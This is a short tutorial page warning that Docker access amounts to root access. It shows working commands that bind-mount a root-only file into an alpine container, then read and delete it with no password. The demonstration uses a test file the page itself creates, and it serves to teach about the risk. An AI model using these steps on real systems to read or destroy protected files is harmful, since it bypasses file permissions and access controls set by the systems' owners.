Acesss to containers

Acesss to containers#

Using Docker can lead to security problems that you need to be aware of. This page shows how Docker can easily give it’s user root privileges without entering any passwords - this is because Docker is usually configured to have root privileges.

In the next cell, a file is created to which only root will have access.

mkdir folder
echo "secret super key" > ./folder/secret_file
chmod 000 ./folder/secret_file

Let’s check if casual user can access that file.

cat ./folder/secret_file

cat: ./folder/secret_file: Permission denied

But if you mount the directory where the docker image is located - you’ll have access to read the file and even delete it.

docker run --name hacker_container --rm -v $(pwd)/folder:/folder -itd alpine &> /dev/null
docker exec hacker_container cat folder/secret_file
docker exec hacker_container rm folder/secret_file

secret super key

Don’t forget to clean cache after all.

docker stop hacker_container
rm -r folder

hacker_container